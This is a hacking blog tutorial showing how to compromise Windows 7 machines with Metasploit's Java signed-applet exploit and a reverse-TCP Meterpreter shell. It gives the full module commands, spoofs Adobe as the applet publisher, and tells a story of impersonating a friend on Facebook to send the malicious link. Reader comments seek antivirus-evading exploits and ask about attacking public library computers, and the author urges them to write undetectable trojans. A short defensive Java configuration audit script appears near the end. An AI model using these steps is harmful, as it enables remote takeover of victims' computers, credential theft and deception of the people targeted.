Hacking Windows 7 SP 1 Using Java Signed Applet Social Engineering Code Execution


Type : Tutorial

Level : Easy, Medium, Advanced

Success rate : Excellent

Platform : Win 7 SP 1 (all Windows). I’ve also tried it in Linux Debian 6 using Iceweasel, but no luck... maybe someone has tried it?

Today in this tutorial we will be doing a trick that uses social engineering to attack a victim. Before we start, let me tell you a little story about why I’m writing this tutorial :-) .

Yesterday, 2011/7/29, my friend KENT came to my home and told me that his computer had been hacked because of a link sent by his friend CLARK via Facebook. CLARK didn’t know anything about it, because he never uses his Facebook account; someone had impersonated him and started sending a malicious URL via Facebook. KENT received an inbox message from the fake CLARK on Facebook like this: “hey I’ve uploaded the video of yours here http://attacker.com/videoplaylist”. KENT thought the message came from his friend CLARK, and he was also curious to see what kind of video his friend had uploaded.

Interesting, isn’t it? Someone can act as another person and start sending malicious URLs. (You can view here how to hack Facebook using a man-in-the-middle attack.) Now in this tutorial we will do almost the same thing: Hacking Windows 7 SP 1 Using Java Signed Applet Social Engineering Code Execution. Let’s start.

Requirement :

1. Metasploit Framework

2. Operating System (I recommend using Linux OS or Backtrack 5)

Step By Step :

1. Open msfconsole and find the java_signed_applet exploit with the command search java_signed_applet. If you can’t find it, update your Metasploit Framework to a newer version with the msfupdate command. If the exploit is available, continue as in the picture below.

Legends :

use exploit/multi/browser/java_signed_applet ---> load the java_signed_applet exploit

set payload windows/meterpreter/reverse_tcp ---> set the reverse_tcp meterpreter to connect back to our machine

2. Next, we need to set some required switches (options) for the attack to work. The picture below shows my configuration; to view the available switches, type show options.

Legends :

set appletname Adobe_Inc ---> the applet name shown to the victim, chosen so that the victim is not suspicious of the link you give

set certcn Adobe Flash Player ---> On older versions the dialog will display the value of CERTCN in the "Publisher" line. Newer JVMs display "UNKNOWN" when the signature is not trusted (i.e., it's not signed by a trusted CA).

set srvhost 192.168.8.92 ---> host that serves the exploit

set srvport 80 ---> I chose 80 because it works really well for computer social engineering, especially social engineering via a website

set uripath videoplaylist ---> the URL format to send to victim (http://192.168.8.92/videoplaylist)

set lhost 192.168.8.92 ---> connect-back address used when the attack succeeds

set lport 443 ---> port used to connect back to our machine

3. When everything has been set up correctly, run the exploit command.

This is the URL you should give to your victim: http://192.168.8.92/videoplaylist.

4. When the victim opens that link in their browser, a dialog box immediately appears warning that the digital signature cannot be verified, as in the picture below.

But it’s okay, because we are sending that link to KENT as CLARK, so the success probability is still above 75% :-P .

5. After the victim opens the malicious URL and clicks RUN, here’s the screenshot from the attacker's computer.

6. Press CTRL + C to stop the process, or you can directly run sessions -l to view the active sessions.

7. Yes, we have 1 active session in our list. To interact with that session, simply run sessions -i 1, where 1 is the ID of the session.

PWNED! We’re already inside the victim's computer.

For the next step after successfully gaining access, you can see the following tutorials :

5 Steps Using Meterpreter Keylogging

Login Windows Using PsExec Hash

5 Step to Enable Remote Desktop

And many more. . .

Countermeasure :

1. Minimize opening files you don’t know.

2. Read the alert carefully if one appears. Just clicking “Next” or “OK” when an alert appears is not a good idea :-P
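
A technical control to go with the two countermeasures above, as an added example that is not part of the original tutorial: the Java deployment.properties file has a setting that decides whether a user is even allowed to accept a signer that no trusted CA vouches for, which is the dialog from step 4. This script audits such a file. The property name is taken from Oracle's Java deployment configuration documentation; the two sample files are constructed.

```python
# Added example: audit a Java deployment.properties for the setting behind the
# "digital signature cannot be verified" Run prompt. Sample files are constructed.

# Property name from Oracle's Java deployment configuration documentation.
NOT_IN_CA = "deployment.security.askgrantdialog.notinca"

WEAK = """\
# constructed sample: defaults left in place
deployment.security.askgrantdialog.show=true
"""

HARDENED = """\
# constructed sample: system-level file pushed by an administrator
deployment.security.askgrantdialog.notinca=false
deployment.security.askgrantdialog.notinca.locked
"""

def parse_properties(text):
    """Parse the plain key=value subset of the .properties format."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":          # blank line or comment
            continue
        for i, ch in enumerate(line):
            if ch in "=:":                        # first separator splits key/value
                props[line[:i].strip()] = line[i + 1:].strip()
                break
        else:
            props[line] = ""                      # bare key, e.g. "<name>.locked"
    return props

def audit(text):
    """Return findings; an empty list means the untrusted-signer prompt is blocked."""
    props = parse_properties(text)
    findings = []
    # The documented default is true: the user may accept a signer no CA vouches for.
    if props.get(NOT_IN_CA, "true").lower() != "false":
        findings.append(f"{NOT_IN_CA} is not false: users can click Run on an untrusted signer")
    elif f"{NOT_IN_CA}.locked" not in props:
        findings.append(f"{NOT_IN_CA} is false but not locked: user settings can change it")
    return findings

if __name__ == "__main__":
    for name, sample in (("WEAK", WEAK), ("HARDENED", HARDENED)):
        print(name, audit(sample) or "ok")
```

With the setting false and locked in the system-level file, the decision no longer rests on whether the user reads the alert.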

Hope you enjoyed… :-)

Comments are welcome, just drop them below :)


Written by Vishnu Valentino.

Founder of hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com


20 Responses to “Hacking Windows 7 SP 1 Using Java Signed Applet Social Engineering Code Execution”

  1. puppet says:

    I don't understand…
    What is the command to attack the IP address of our victim???

  2. puppet says:

    I don't understand…
    Let's say we know the victim IP…
    then how do we set the attack…
    I'm confused with the command…

  3. jouj says:

    Hey guys, I'm new to the hacking stuff. I tried this tutorial step by step but I had a problem: how to get from step 3 to step 4

  4. jouj says:

    OK, thanks for the reply. So if I want to execute this tutorial in a LAN, how do I get from step 3 to step 4???

    • v4L says:

      #jouj
      Step 3 –> prepare the server for the exploit
      Step 4 –> you see the URL generated at step 3? That is the URL you should send to the victim, then wait until the victim opens that URL in their browser.

  5. puppet says:

    Hey…
    I think I have found another method that is similar to this attack… I watched it on YouTube…
    http://www.youtube.com/watch?v=LoFaitVRg9U&feature=related & http://www.youtube.com/watch?v=JbDOa5lgbFg..
    (but still working on it..)

  6. will.i.am says:

    I am using BT5 to follow the tutorial. However, I open the URL in the Win XP VM and it says done and nothing happens, while in the Meterpreter it says Handlin request from IP:1129…
    I have the 2 VMs (Win 7 and BT5) connected in the same network but it does not work.

    In the SRVHOST = LHOST = IP in BT5. Any ideas?

    Thanks

  7. will.i.am says:

    I already solved it… You need to download the latest java version ;)

    By 50 Mb of space I had to install win 7 in the VM all over again. Crazy…

  8. AbuM@lek says:

    Hi, great job, thank you

    Please confirm to me:
    the JRE (Java) plug-in must already be installed on the victim machine for this exploit to succeed?!!!!
    Am I right?

    Other question! Does it succeed in all browsers, or just IE???

    Thanks a lot :) .

  9. AbuM@lek says:

    And it is detected by AV and firewalls,
    is there any other exploit that is FUD???
    Thanks

  10. AbuM@lek says:

    Thanks, are there any other exploits for Win7 SP1 (specially, not detected?!)

  11. DeusIgni says:

    Whenever I try to open a shell the antivirus software deletes it immediately. Even through this method. Why?
    -DeusIgni

  12. DeusIgni says:

    #Valentino
    You have told that to me as well, it's all about the "attack logic". That logic doesn't work. Show us a
    method that does.
    -DeusIgni

    • v4L says:

      #deuslgni
      Yes, as I say, it’s the logic… Of course your antivirus can detect it (be realistic… antivirus is updated almost every 1-2 days)… If you want to be undetected, you can make a backdoor/trojan by yourself and think about a new algorithm that can’t be traced by the antivirus intelligence logic scan.
      Again, I say that this tutorial is only the logic… From here, you can learn how to make a backdoor/trojan/virus hidden and undetected by antivirus…
      Last: in this process, nothing is instant, but at least you already reduce your learning process timeline while you understand the logic of the attack and then move on to learn a new subject about “hiding backdoor from antivirus”.

  13. jan says:

    Hi, Vish—Got a Question 4 u:

    Public Libraries use Java.

    Can this be performed by a WiFi LapTop inside the Library, or across the street?

    Would the J2EE be the appropriate Countermeasure to prevent this from happening at all?

    thanks.
